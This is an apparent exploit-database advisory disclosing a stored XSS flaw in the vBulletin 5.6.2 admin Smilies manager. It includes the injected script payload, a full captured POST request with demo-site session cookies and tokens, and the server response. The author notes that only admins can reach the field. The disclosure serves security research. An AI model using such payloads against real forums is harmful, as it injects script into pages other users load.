# Exploit Title: vBulletin 5.6.2 Stored XSS
# Date:15.08.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/features/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Blog : https://pentest-vincent.blogspot.com/
# PoC: https://pentest-vincent.blogspot.com/2020/08/vbulletin-562-stored-xss.html
PoC:
Go to the Admin panel -> open Smilies -> Smilies manager->Edit Smilie
Categories->edit Smile:
https://72329406fb3a-041342.demo.vbulletin.net/admincp/index.php
https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=edit&table=smilie&id=1&pp=20&page=1&imagecategoryid=4
Put our code in the field "Title" or "Text to Replace" and other fields.
Our code:
""><script>alert("field")</script><marquee>test</marquee>
And save this. We have a stored XSS and html code injection.
Picture:
https://imgur.com/a/JUsmPye
Video:
https://www.youtube.com/watch?v=D526ZLgH90Y&feature=youtu.be
https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=update
Host: 72329406fb3a-041342.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 399
Origin: https://72329406fb3a-041342.demo.vbulletin.net
Connection: keep-alive
Referer: https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=edit&table=smilie&id=1&pp=20&page=1&imagecategoryid=4
Cookie: vb41342lastvisit=1597392323; vb41342lastactivity=1597521919;
vb41342np_notices_displayed=; vb41342contentlist_perpage=25;
vb41342sessionhash=845f579d01bdd42b4bf3020d4893f366;
PHPSESSID=d8cafaa942534428ce54ea2ba5a221ec7ed9532a6d9666b8;
BIGipServervbdemo-web_POOL=1459677194.20480.0000;
vb41342cpsession=18ca6bf5d79e5564ac2aa3a201612500;
vb41342sitebuilder_active=1
Upgrade-Insecure-Requests: 1
s=845f579d01bdd42b4bf3020d4893f366&do=update&adminhash=38c14dd475e4de2e3f95676226993ebd&securitytoken=1597523664-7fba45cf7add9630b2fda3e409ad0da7beec797c&title=Smile""><script>alert("field")</script><marquee>test</marquee>&smilietext=:)&imagespath=smile.png&imagecategoryid=4&displayorder=1&id=1&table=smilie&page=1&perpage=20&massmove=0&returnimagecategoryid=4
POST: HTTP/1.1 200 OK
Date: Sat, 15 Aug 2020 20:34:36 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Connection: keep-alive, Keep-Alive
Keep-Alive: timeout=2, max=100
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
p.s.
Today i haven't idea how to use this bug, because only the admin user
has an access to the admincp and can insert xss code in the fields.